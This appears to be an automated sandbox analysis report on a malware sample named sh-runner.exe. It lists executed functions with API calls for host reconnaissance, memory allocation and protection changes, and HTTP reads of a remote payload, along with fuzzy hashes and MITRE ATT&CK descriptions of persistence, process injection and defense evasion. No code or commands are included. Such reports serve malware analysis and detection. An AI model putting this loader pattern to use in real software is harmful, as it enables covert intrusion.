Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 58c5dfcd8be37af0757fe94257b284d1559d3cc6d61e1888325f7b31be4c0e03
Instruction ID: d9d18131e642478be87a301a0f712563c382d292a9d6d85189d49e2da081270d
Opcode Fuzzy Hash: 58c5dfcd8be37af0757fe94257b284d1559d3cc6d61e1888325f7b31be4c0e03
Instruction Fuzzy Hash: 30F0302264494185EA69BF2EEC41BF85360EB8DF9CF981135DE4C466A5DF3DE8C2CB10

Function 00007FF72BD1CB24 Relevance: 5.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF72BD1CB2F
CloseHandle.KERNEL32 ref: 00007FF72BD1CB37
CloseHandle.KERNEL32 ref: 00007FF72BD1CB5A
CloseHandle.KERNEL32 ref: 00007FF72BD1CB3F

Part of subcall function 00007FF72BD6A710: RtlCaptureContext.KERNEL32 ref: 00007FF72BD6A78E
Part of subcall function 00007FF72BD6A710: RtlUnwindEx.KERNEL32 ref: 00007FF72BD6A7AC
Part of subcall function 00007FF72BD6A710: abort.MSVCRT ref: 00007FF72BD6A7B2
Part of subcall function 00007FF72BD6A710: abort.MSVCRT ref: 00007FF72BD6A7D0

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseHandle$abort$CaptureContextUnwind
String ID:
API String ID: 2434310364-0
Opcode ID: f533ec74d414918267225ba9c748fb77645763afc5ea37744425af6202ba7a08
Instruction ID: 898041d65bc38aa0f2c2a847adf0f01ef914c467f6af5d50723f9116e8e6cb9f
Opcode Fuzzy Hash: f533ec74d414918267225ba9c748fb77645763afc5ea37744425af6202ba7a08
Instruction Fuzzy Hash: 81E0BF21A4845306E80DFA6A6C123FC8650EF4FF80FC59834EC6E177A3CD2D25424B25

Function 00007FF72BD1CA45 Relevance: 5.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF72BD1CB2F
CloseHandle.KERNEL32 ref: 00007FF72BD1CB37
CloseHandle.KERNEL32 ref: 00007FF72BD1CB5A
CloseHandle.KERNEL32 ref: 00007FF72BD1CB3F

Part of subcall function 00007FF72BD6A710: RtlCaptureContext.KERNEL32 ref: 00007FF72BD6A78E
Part of subcall function 00007FF72BD6A710: RtlUnwindEx.KERNEL32 ref: 00007FF72BD6A7AC
Part of subcall function 00007FF72BD6A710: abort.MSVCRT ref: 00007FF72BD6A7B2
Part of subcall function 00007FF72BD6A710: abort.MSVCRT ref: 00007FF72BD6A7D0

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseHandle$abort$CaptureContextUnwind
String ID:
API String ID: 2434310364-0
Opcode ID: 35518d0840023c7934166721ae7b16f5a9fb2bcdc1a3a5e3fbe5953f01b984ae
Instruction ID: 56d946c9ad6ce3240ae45180b0afd279dd07157f652b853a5300fabda707b92c
Opcode Fuzzy Hash: 35518d0840023c7934166721ae7b16f5a9fb2bcdc1a3a5e3fbe5953f01b984ae
Instruction Fuzzy Hash: 32E0BF20A4845306E80CFA6A6C113FC8650EF8FF80FC4A834DC6E177A3CD2D25425A25

Analysis Process: sh-runner.exePID: 2196, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	741
Total number of Limit Nodes:	37

Executed Functions

Function 00000112CF6B7D70 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 467
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32 ref: 00000112CF6B7F66
GetComputerNameExA.KERNELBASE ref: 00000112CF6B800C
GetComputerNameExA.KERNELBASE ref: 00000112CF6B8051
GetAdaptersInfo.IPHLPAPI ref: 00000112CF6B80B2
GetAdaptersInfo.IPHLPAPI ref: 00000112CF6B80E7

Strings

, xrefs: 00000112CF6B7E33

Memory Dump Source

Source File: 00000004.00000002.3055656631.00000112CF6B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000112CF6B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_112cf6b0000_sh-runner.jbxd

Similarity

API ID: Name$AdaptersComputerInfo$User
String ID:
API String ID: 1713523329-3916222277
Opcode ID: 847f31a267256c4b477c3e55c6d651f5123c8fbdc2e5fbf7ef3bfa4e34fd3b77
Instruction ID: 4fca6403c0d1e98e18d8e7996bf13c061673efcb04a181fa0b8daa884c874f7e
Opcode Fuzzy Hash: 847f31a267256c4b477c3e55c6d651f5123c8fbdc2e5fbf7ef3bfa4e34fd3b77
Instruction Fuzzy Hash: 52F112303149088FE798EB2CC495FE973E1FB9C304F514568E69AC7296DE34E855DB82

Function 00000112CF690020 Relevance: 3.3, APIs: 2, Instructions: 262nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 00000112CF6900EF
NtProtectVirtualMemory.NTDLL ref: 00000112CF690237

Memory Dump Source

Source File: 00000004.00000003.1949399354.00000112CF690000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000112CF690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_112cf690000_sh-runner.jbxd

Similarity

API ID: MemoryVirtual$AllocateProtect
String ID:
API String ID: 2931642484-0
Opcode ID: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
Instruction ID: 7f54a792e169ea6c0138c1752ad6803a1b72f27c65e03fc6a079af8bfdae468f
Opcode Fuzzy Hash: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
Instruction Fuzzy Hash: 68710530618A485FE71C9B38D842BEE77D1F788310F60562DFAD7C3292DA35D94286C2

Function 00000112CF4C044E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET(00000000,00000000,84A83200,00000000), ref: 00000112CF4C046D
VirtualAlloc.KERNELBASE ref: 00000112CF4C050E
InternetReadFile.WININET ref: 00000112CF4C052D

Strings

U.;, xrefs: 00000112CF4C0467

Memory Dump Source

Source File: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000112CF4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_112cf4c0000_sh-runner.jbxd

Yara matches

Similarity

API ID: AllocFileHttpInternetOpenReadRequestVirtual
String ID: U.;
API String ID: 1187293180-4213443877
Opcode ID: 5690493dc9ff9f8f16933898c455d2a5e8e45ea3ee84a79ee5b969fd92fa3e91
Instruction ID: 1893551d209afdb88124fa866d2723ac9299860243f502e6390b5a4ee01d9720
Opcode Fuzzy Hash: 5690493dc9ff9f8f16933898c455d2a5e8e45ea3ee84a79ee5b969fd92fa3e91
Instruction Fuzzy Hash: 473106A030EF882FF71E01693C6AB3A2AD9C79A351F15419BF20DC71E3EC448C45827A

Function 00000112CF4C03B2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 160
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetConnectA.WININET(00000000,00000003,00000000,00000000), ref: 00000112CF4C03CF

Part of subcall function 00000112CF4C044E: HttpOpenRequestA.WININET(00000000,00000000,84A83200,00000000), ref: 00000112CF4C046D

VirtualAlloc.KERNELBASE ref: 00000112CF4C050E
InternetReadFile.WININET ref: 00000112CF4C052D

Strings

U.;, xrefs: 00000112CF4C0467

Memory Dump Source

Source File: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000112CF4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_112cf4c0000_sh-runner.jbxd

Yara matches

Similarity

API ID: Internet$AllocConnectFileHttpOpenReadRequestVirtual
String ID: U.;
API String ID: 258568742-4213443877
Opcode ID: 6fc8f7e9d39f1beb81a02fe686e0033c171592fa012045b2ecca9d2f46ba6301
Instruction ID: fabdbe3095bc90eef468ee72f3158c548ed07a7cc009858f2d8068212d199f37
Opcode Fuzzy Hash: 6fc8f7e9d39f1beb81a02fe686e0033c171592fa012045b2ecca9d2f46ba6301
Instruction Fuzzy Hash: 5141D47020DF882EF72E42285C55FBFABA8E752716F41529BE745CA0E3D8144C9482BA

Function 00000112CF4C0366 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
librarynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(696E6977,00000000), ref: 00000112CF4C0381
InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 00000112CF4C039C

Strings

wini, xrefs: 00000112CF4C036C

Memory Dump Source

Source File: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000112CF4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_112cf4c0000_sh-runner.jbxd

Yara matches

Similarity

API ID: InternetLibraryLoadOpen
String ID: wini
API String ID: 2559873147-1606035523
Opcode ID: 0662d3df314d0fc764c5b615890f2d42f03bb8aebb061ff02a7170b5085c526b
Instruction ID: 0086e64d7b7f9af29c23a186704a7c4da466b999390eea5688f14ea2db7d47a0
Opcode Fuzzy Hash: 0662d3df314d0fc764c5b615890f2d42f03bb8aebb061ff02a7170b5085c526b
Instruction Fuzzy Hash: 0BF027A010EA8C2FD32949745C4A9777B99D712205306425FE185C21B2C9100C408266

Function 00000112CF6C1ED0 Relevance: 3.1, APIs: 2, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFiberEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,000168BF,?,?,00000112CF6B2904), ref: 00000112CF6C1F66
DeleteFiber.KERNELBASE(?,?,?,?,?,?,?,?,?,?,000168BF,?,?,00000112CF6B2904), ref: 00000112CF6C1F8E

Memory Dump Source

Source File: 00000004.00000002.3055656631.00000112CF6B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000112CF6B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_112cf6b0000_sh-runner.jbxd

Similarity

API ID: Fiber$CreateDelete
String ID:
API String ID: 2527733159-0
Opcode ID: e666d9c0b0ba46b256699f288a6e5ecb4e148a06e009019892e951112d41f9a7
Instruction ID: 3459f722935aeb7bc90b269abf34a7258c639d1664d5d4544a9e36d74c47906d
Opcode Fuzzy Hash: e666d9c0b0ba46b256699f288a6e5ecb4e148a06e009019892e951112d41f9a7
Instruction Fuzzy Hash: 6E314F30214E458FE798EF38C448BEAB7E1FB98311F6545A9E6A9C3291DB34D451CB42

Function 00000112CF6BD510 Relevance: 1.6, APIs: 1, Instructions: 143
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrGetProcedureAddress.NTDLL ref: 00000112CF6BD627

Memory Dump Source

Source File: 00000004.00000002.3055656631.00000112CF6B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000112CF6B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_112cf6b0000_sh-runner.jbxd

Similarity

API ID: AddressProcedure
String ID:
API String ID: 3653107232-0
Opcode ID: c880d098a533d0f3fb35a3b8b130c654e78c7eb0b2f2c7cb6df4c980cc83c31e
Instruction ID: 61ae68e20ebb0f10324a01a40013e34f5993e809b80dd3f12a3bd4b9be1e3b4a
Opcode Fuzzy Hash: c880d098a533d0f3fb35a3b8b130c654e78c7eb0b2f2c7cb6df4c980cc83c31e
Instruction Fuzzy Hash: A541073111CA044FE758DB28DC85FEA73E0FB84314F64046DEA9AC7251EA30E8528BC7

Analysis Process: sh-runner.exePID: 5472, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	6.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	733
Total number of Limit Nodes:	46

Executed Functions

Function 00000184BE567D70 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 467
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32 ref: 00000184BE567F66
GetComputerNameExA.KERNELBASE ref: 00000184BE56800C
GetComputerNameExA.KERNELBASE ref: 00000184BE568051
GetAdaptersInfo.IPHLPAPI ref: 00000184BE5680B2
GetAdaptersInfo.IPHLPAPI ref: 00000184BE5680E7

Strings

, xrefs: 00000184BE567E33

Memory Dump Source

Source File: 00000009.00000002.3055615304.00000184BE560000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000184BE560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_184be560000_sh-runner.jbxd

Similarity

API ID: Name$AdaptersComputerInfo$User
String ID:
API String ID: 1713523329-3916222277
Opcode ID: 847f31a267256c4b477c3e55c6d651f5123c8fbdc2e5fbf7ef3bfa4e34fd3b77
Instruction ID: 0493fcf3ea78bd872395a2f7220a21b2ceae6d608a9c6e2a13d06c277b50a0b9
Opcode Fuzzy Hash: 847f31a267256c4b477c3e55c6d651f5123c8fbdc2e5fbf7ef3bfa4e34fd3b77
Instruction Fuzzy Hash: A1F13F70314909CFEB94EB68D495BA6B3E2FB9C340F408578E589C7296DE34EE45CB42

Function 00000184BE540020 Relevance: 3.3, APIs: 2, Instructions: 262nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 00000184BE5400EF
NtProtectVirtualMemory.NTDLL ref: 00000184BE540237

Memory Dump Source

Source File: 00000009.00000003.2025333066.00000184BE540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000184BE540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_3_184be540000_sh-runner.jbxd

Similarity

API ID: MemoryVirtual$AllocateProtect
String ID:
API String ID: 2931642484-0
Opcode ID: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
Instruction ID: d86569eeaf66e34ca2ccef4ac78980573b420741214eca21dc33aff0f227e5b3
Opcode Fuzzy Hash: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
Instruction Fuzzy Hash: CE71177061CA494BE76C9B6CD8427BAB7E1F7C4310F60962DF887C3296DE34D9428782

Function 00000184BE2A044E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET(00000000,00000000,84A83200,00000000), ref: 00000184BE2A046D
VirtualAlloc.KERNELBASE ref: 00000184BE2A050E
InternetReadFile.WININET ref: 00000184BE2A052D

Strings

U.;, xrefs: 00000184BE2A0467

Memory Dump Source

Source File: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000184BE2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_184be2a0000_sh-runner.jbxd

Yara matches

Similarity

API ID: AllocFileHttpInternetOpenReadRequestVirtual
String ID: U.;
API String ID: 1187293180-4213443877
Opcode ID: 5690493dc9ff9f8f16933898c455d2a5e8e45ea3ee84a79ee5b969fd92fa3e91
Instruction ID: 4d8085325d0376d757ff59a0a3720a7d39b94022f9a8cc26d6e71faef9c845c4
Opcode Fuzzy Hash: 5690493dc9ff9f8f16933898c455d2a5e8e45ea3ee84a79ee5b969fd92fa3e91
Instruction Fuzzy Hash: 0B3106A030EB882FF21E01A93C6AB362AD9D79A351F15419FF10DC71E3EC44CC06826A

Function 00000184BE2A03B2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 160
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetConnectA.WININET(00000000,00000003,00000000,00000000), ref: 00000184BE2A03CF

Part of subcall function 00000184BE2A044E: HttpOpenRequestA.WININET(00000000,00000000,84A83200,00000000), ref: 00000184BE2A046D

VirtualAlloc.KERNELBASE ref: 00000184BE2A050E
InternetReadFile.WININET ref: 00000184BE2A052D

Strings

U.;, xrefs: 00000184BE2A0467

Memory Dump Source

Source File: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000184BE2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_184be2a0000_sh-runner.jbxd

Yara matches

Similarity

API ID: Internet$AllocConnectFileHttpOpenReadRequestVirtual
String ID: U.;
API String ID: 258568742-4213443877
Opcode ID: 6fc8f7e9d39f1beb81a02fe686e0033c171592fa012045b2ecca9d2f46ba6301
Instruction ID: 96b469c47470d191f7012530f4572d08aed63898e93313ee7c318b87a49ededd
Opcode Fuzzy Hash: 6fc8f7e9d39f1beb81a02fe686e0033c171592fa012045b2ecca9d2f46ba6301
Instruction Fuzzy Hash: F441257020DB8A2FF73E42641C55F7A3BA8F792711F00929FE646CA0E3DC149E069365

Function 00000184BE2A0366 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
librarynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(696E6977,00000000), ref: 00000184BE2A0381
InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 00000184BE2A039C

Strings

wini, xrefs: 00000184BE2A036C

Memory Dump Source

Source File: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000184BE2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_184be2a0000_sh-runner.jbxd

Yara matches

Similarity

API ID: InternetLibraryLoadOpen
String ID: wini
API String ID: 2559873147-1606035523
Opcode ID: 0662d3df314d0fc764c5b615890f2d42f03bb8aebb061ff02a7170b5085c526b
Instruction ID: ff494dc53b0d891822866c532e749412b0e8937f8d4d391566143381ba6b658d
Opcode Fuzzy Hash: 0662d3df314d0fc764c5b615890f2d42f03bb8aebb061ff02a7170b5085c526b
Instruction Fuzzy Hash: 5FF0E5A060E68C2FE32D5EB49C8A9373F9DDB57309316969FF086C25B3CD614C419325

Function 00000184BE571ED0 Relevance: 3.1, APIs: 2, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFiberEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,000168BF,?,?,00000184BE562904), ref: 00000184BE571F66
DeleteFiber.KERNELBASE(?,?,?,?,?,?,?,?,?,?,000168BF,?,?,00000184BE562904), ref: 00000184BE571F8E

Memory Dump Source

Source File: 00000009.00000002.3055615304.00000184BE560000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000184BE560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_184be560000_sh-runner.jbxd

Similarity

API ID: Fiber$CreateDelete
String ID:
API String ID: 2527733159-0
Opcode ID: e666d9c0b0ba46b256699f288a6e5ecb4e148a06e009019892e951112d41f9a7
Instruction ID: 0657fabcb8723877ccc9089d5f707d62be6e7a86e008e5cfe09b50fc5f0b43b0
Opcode Fuzzy Hash: e666d9c0b0ba46b256699f288a6e5ecb4e148a06e009019892e951112d41f9a7
Instruction Fuzzy Hash: 37315E70214A098FE7A4EF68C448BAAF7E1FF98311F6445B9E089C3291EF34D551CB46

Function 00000184BE56D510 Relevance: 1.6, APIs: 1, Instructions: 143
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrGetProcedureAddress.NTDLL ref: 00000184BE56D627

Memory Dump Source

Source File: 00000009.00000002.3055615304.00000184BE560000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000184BE560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_184be560000_sh-runner.jbxd

Similarity

API ID: AddressProcedure
String ID:
API String ID: 3653107232-0
Opcode ID: c880d098a533d0f3fb35a3b8b130c654e78c7eb0b2f2c7cb6df4c980cc83c31e
Instruction ID: bb186f58f14e76168ebbbdef48de5f9db1aa7e9ec36de70b15600b9b382cb916
Opcode Fuzzy Hash: c880d098a533d0f3fb35a3b8b130c654e78c7eb0b2f2c7cb6df4c980cc83c31e
Instruction Fuzzy Hash: 5C410AB1118A058FE768EB58DC85BF6B3E0FBD5358F54493DE48AC3251EE30E9428786

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

